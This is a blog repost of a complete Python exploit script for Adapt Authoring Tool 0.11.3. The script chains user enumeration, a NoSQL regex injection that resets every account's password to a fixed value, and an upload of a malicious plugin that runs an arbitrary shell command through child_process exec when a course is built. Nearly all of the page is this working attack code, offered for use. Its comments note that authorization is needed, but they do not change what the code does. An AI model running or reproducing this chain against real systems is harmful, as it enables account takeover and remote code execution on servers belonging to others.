Jump to content
  • Entries

    16114
  • Comments

    7952
  • Views

    86383860

Contributors to this blog

  • HireHackking 16114

About this blog

Topics include hacking techniques such as penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, and social engineering, which are used to identify and fix security flaws in systems.

# Exploit Title: Adapt Authoring Tool 0.11.3 - Remote Command Execution (RCE)
# Date: 2024-11-24
# Exploit Author: Eui Chul Chung
# Vendor Homepage: https://www.adaptlearning.org/
# Software Link: https://github.com/adaptlearning/adapt_authoring
# Version: 0.11.3
# CVE Identifiers: CVE-2024-50672, CVE-2024-50671

import io
import sys
import json
import zipfile
import argparse
import requests
import textwrap


def get_session_cookie(username, password):
    """Log in through ``/api/login`` and return the resulting cookies.

    Args:
        username: Account identifier; sent as the ``email`` form field.
        password: Password for that account.

    Returns:
        The response cookies as a plain dict when the server answers with
        HTTP 200, otherwise ``None``.
    """
    credentials = {"email": username, "password": password}
    response = requests.post(f"{args.url}/api/login", data=credentials)

    # Anything other than 200 is treated as a failed login.
    if response.status_code != 200:
        return None

    print(f"[+] Login as {username}")
    return response.cookies.get_dict()


def get_users():
    """Fetch the user list from ``/api/user`` and print it ordered by role.

    Authenticates with ``args.username`` / ``args.password`` and terminates
    the process via ``sys.exit()`` when that login fails.

    Returns:
        A list of ``{"email": ..., "role": ...}`` dicts, where ``role`` is the
        name of the first role of each user, ordered from
        ``Authenticated User`` through ``Course Creator`` to ``Super Admin``.

    Raises:
        KeyError: If a user carries a role name outside those three.
    """
    session_cookie = get_session_cookie(args.username, args.password)
    if session_cookie is None:
        print("[-] Login failed")
        sys.exit()

    listing = requests.get(f"{args.url}/api/user", cookies=session_cookie)

    # Rank used only for ordering the output; lowest privilege first.
    role_rank = {"Authenticated User": 1, "Course Creator": 2, "Super Admin": 3}
    accounts = sorted(
        (
            {"email": entry["email"], "role": entry["roles"][0]["name"]}
            for entry in json.loads(listing.text)
        ),
        key=lambda account: role_rank[account["role"]],
    )

    for account in accounts:
        print(f"[+] {account['email']} ({account['role']})")

    return accounts


def reset_password(users):
    """Set account passwords to ``HaXX0r3d!`` through the password reset API.

    Two phases:

    1. Request a password reset token for every e-mail in ``users`` via
       ``/api/createtoken``.
    2. Send ``PUT /api/userpasswordreset/w00tw00t`` requests whose ``token``
       field is a ``$regex`` filter instead of a literal token, growing the
       matched hexadecimal prefix one character at a time.

    NOTE: this changes credentials on the target and is destructive for its
    users; it must only be run against systems you are authorized to test.

    Args:
        users: List of dicts with an ``email`` key (the shape returned by
            ``get_users``).

    Returns:
        None. Progress is reported on stdout only; no per-account result is
        collected.
    """
    # Overwrite potentially expired password reset tokens
    for user in users:
        data = {"email": user["email"]}
        requests.post(f"{args.url}/api/createtoken", data=data)
    print("[+] Generate password reset token for every user")

    # Candidate characters appended to each prefix (lowercase hex digits).
    valid_characters = "0123456789abcdef"
    # "^" anchors the pattern so every candidate matches a token *prefix*.
    next_tokens = ["^"]

    # Ensure that only a single result is returned at a time
    # Breadth-first walk: each pass extends the prefixes kept by the previous
    # pass by one character; the loop ends once no prefix is kept.
    while next_tokens:
        prev_tokens = next_tokens
        next_tokens = []

        for token in prev_tokens:
            for ch in valid_characters:
                data = {"token": {"$regex": token + ch}, "password": "HaXX0r3d!"}
                res = requests.put(
                    f"{args.url}/api/userpasswordreset/w00tw00t",
                    json=data,
                )

                # Multiple results returned
                # HTTP 500 is interpreted (per the original author's note) as
                # "more than one token matches this prefix", so the prefix is
                # kept and refined further. Any other status drops the prefix.
                if res.status_code == 500:
                    next_tokens.append(token + ch)

    print("[+] Reset every password to HaXX0r3d!")


def create_plugin(plugin_name):
    """Build an in-memory zip archive laid out as an Adapt extension plugin.

    The archive contains four entries below ``<plugin_name>/``:

    * ``bower.json`` - manifest; registers ``/scripts/postcopy.js`` under the
      ``adaptpostcopy`` script key.
    * ``properties.schema`` - schema declaring ``pluginLocations.course``.
    * ``js/main.js`` - empty file.
    * ``scripts/postcopy.js`` - JavaScript source with ``args.command``
      interpolated verbatim into an ``exec("...")`` call.

    Args:
        plugin_name: Used as the manifest ``name`` and as the top-level
            directory inside the archive.

    Returns:
        An ``io.BytesIO`` holding the zip data, rewound to offset 0.
    """
    bower_manifest = {
        "name": plugin_name,
        "version": "1.0.0",
        "extension": "exploit",
        "main": "/js/main.js",
        "displayName": "exploit",
        "keywords": ["adapt-plugin", "adapt-extension"],
        "scripts": {"adaptpostcopy": "/scripts/postcopy.js"},
    }

    schema = {
        "properties": {
            "pluginLocations": {
                "type": "object",
                "properties": {"course": {"type": "object"}},
            }
        }
    }

    postcopy_source = textwrap.dedent(
        f"""
    const {{ exec }} = require("child_process");

    module.exports = async function (fs, path, log, options, done) {{
      try {{
        exec("{args.command}");
      }} catch (err) {{
        log(err);
      }}
      done();
    }};
    """
    ).strip()

    # (path inside the plugin directory, text content), in archive order.
    entries = (
        ("bower.json", json.dumps(bower_manifest)),
        ("properties.schema", json.dumps(schema)),
        ("js/main.js", ""),
        ("scripts/postcopy.js", postcopy_source),
    )

    archive = io.BytesIO()
    with zipfile.ZipFile(archive, "a", zipfile.ZIP_DEFLATED, False) as bundle:
        for relative_path, text in entries:
            bundle.writestr(f"{plugin_name}/{relative_path}", text.encode())

    # Rewind so the caller can read the archive from the start.
    archive.seek(0)
    return archive


def find_plugin(cookies, plugin_type, plugin_name):
    """Look up the ``_id`` of an installed plugin by name.

    Args:
        cookies: Session cookies sent with the request.
        plugin_type: Plugin category; ``"type"`` is appended to form the API
            path (e.g. ``"extension"`` queries ``/api/extensiontype``).
        plugin_name: Value compared against each entry's ``name`` field.

    Returns:
        The ``_id`` of the first entry whose name matches, or ``None`` when
        no entry matches.
    """
    listing = requests.get(f"{args.url}/api/{plugin_type}type", cookies=cookies)
    matching_ids = (
        entry["_id"]
        for entry in json.loads(listing.text)
        if entry["name"] == plugin_name
    )
    return next(matching_ids, None)


def create_course(cookies):
    """Create a minimal course hierarchy and return the course ID.

    Issues one POST per level, each parented to the object created just
    before it: course -> contentobject -> article -> block, followed by a
    ``text`` component placed inside the block.

    Args:
        cookies: Session cookies sent with every request.

    Returns:
        The ``_id`` of the newly created course.
    """
    content_api = f"{args.url}/api/content"

    def create(kind, payload):
        # POST one content object and hand back the raw response.
        return requests.post(f"{content_api}/{kind}", cookies=cookies, json=payload)

    def created_id(kind, payload):
        return json.loads(create(kind, payload).text)["_id"]

    course_id = created_id("course", {})

    # Each level becomes the parent of the next one.
    parent_id = course_id
    for kind in ("contentobject", "article", "block"):
        parent_id = created_id(
            kind, {"_courseId": course_id, "_parentId": parent_id}
        )

    text_component_id = find_plugin(cookies, "component", "adapt-contrib-text")

    # The response of the component request is not inspected.
    create(
        "component",
        {
            "_courseId": course_id,
            "_parentId": parent_id,
            "_component": "text",
            "_componentType": text_component_id,
        },
    )

    return course_id


def rce(users):
    """Upload the plugin built by ``create_plugin`` and trigger a course build.

    Steps, in order:

    1. Log in as the first ``Super Admin`` entry of ``users`` with the
       hard-coded password ``HaXX0r3d!``.
    2. Build the plugin archive named ``adapt-contrib-xapi``.
    3. Delete an installed extension of the same name, if one is listed.
    4. Upload the archive and look up the ID of the uploaded extension.
    5. Set ``_isAddedByDefault`` on that extension.
    6. Create a course, request its preview build, then delete the course.

    The process is terminated with ``sys.exit()`` when the login fails or the
    uploaded plugin cannot be found afterwards.

    NOTE: this executes ``args.command`` on the target host and removes an
    installed extension; it must only be run against systems you are
    authorized to test.

    Args:
        users: List of dicts with ``email`` and ``role`` keys (the shape
            returned by ``get_users``).

    Returns:
        None. Progress is reported on stdout.
    """
    session_cookie = None
    for user in users:
        if user["role"] == "Super Admin":
            session_cookie = get_session_cookie(user["email"], "HaXX0r3d!")
            # Only the first Super Admin is tried, even if its login fails.
            break

    if session_cookie is None:
        print("[-] Failed to login as Super Account")
        sys.exit()

    plugin_name = "adapt-contrib-xapi"
    print(f"[+] Create malicious plugin : {plugin_name}")
    plugin = create_plugin(plugin_name)

    # An already installed extension with the same name is deleted before the
    # upload; the response of the DELETE request is not checked.
    print("[+] Scan installed plugins")
    plugin_id = find_plugin(session_cookie, "extension", plugin_name)
    if plugin_id is None:
        print(f"[+] {plugin_name} not found")
    else:
        print(f"[+] Found {plugin_name}")
        print(f"[+] Remove {plugin_name}")
        requests.delete(
            f"{args.url}/api/extensiontype/{plugin_id}",
            cookies=session_cookie,
        )

    print("[+] Upload plugin")
    files = {"file": (f"{plugin_name}.zip", plugin, "application/zip")}
    requests.post(
        f"{args.url}/api/upload/contentplugin",
        cookies=session_cookie,
        files=files,
    )

    # The upload response is not inspected; success is inferred from the
    # extension showing up in the listing afterwards.
    print("[+] Find uploaded plugin")
    plugin_id = find_plugin(session_cookie, "extension", plugin_name)
    if plugin_id is None:
        print(f"[-] {plugin_name} not found")
        sys.exit()
    print(f"[+] Plugin ID : {plugin_id}")

    # Per the progress message, this flag makes the extension part of newly
    # created courses.
    print("[+] Add plugin to new courses")
    data = {"_isAddedByDefault": True}
    requests.put(
        f"{args.url}/api/extensiontype/{plugin_id}",
        cookies=session_cookie,
        json=data,
    )

    print("[+] Create a new course")
    course_id = create_course(session_cookie)

    print("[+] Build course")
    res = requests.get(
        f"{args.url}/api/output/adapt/preview/{course_id}",
        cookies=session_cookie,
    )

    # Only the HTTP status of the preview request is checked; the outcome of
    # the command itself is not observed by this script.
    if res.status_code == 200:
        print("[+] Command execution succeeded")
    else:
        print("[-] Command execution failed")

    # Clean up the temporary course; the uploaded extension is left in place.
    print("[+] Remove course")
    requests.delete(
        f"{args.url}/api/content/course/{course_id}",
        cookies=session_cookie,
    )


def main():
    """Run the three stages in order: enumerate users, reset, execute.

    The user list obtained in the first stage is passed unchanged to both
    later stages.
    """
    print("[*] Retrieve user information")
    accounts = get_users()

    # (banner, stage) pairs executed sequentially with the same user list.
    stages = (
        ("\n[*] Reset password", reset_password),
        ("\n[*] Perform remote code execution", rce),
    )
    for banner, stage in stages:
        print(banner)
        stage(accounts)


if __name__ == "__main__":
    # Parse the command line. The result is bound to the module-level name
    # ``args`` because the functions in this file read ``args.url``,
    # ``args.username``, ``args.password`` and ``args.command`` directly.
    parser = argparse.ArgumentParser()
    parser.add_argument(
        "-u",
        dest="url",
        # The value is used verbatim as the prefix of every request URL
        # (f"{args.url}/api/..."), so it needs an explicit scheme and should
        # not end with a slash. The example points at a local lab instance
        # rather than a third-party host.
        help="Base URL with scheme, no trailing slash (e.g. http://localhost:5000)",
        type=str,
        required=True,
    )
    parser.add_argument(
        "-U",
        dest="username",
        help="Username to authenticate as",
        type=str,
        required=True,
    )
    parser.add_argument(
        "-P",
        dest="password",
        help="Password for the specified username",
        type=str,
        required=True,
    )
    parser.add_argument(
        "-c",
        dest="command",
        help="Command to execute (e.g. touch /tmp/pwned)",
        type=str,
        default="touch /tmp/pwned",
    )
    args = parser.parse_args()

    main()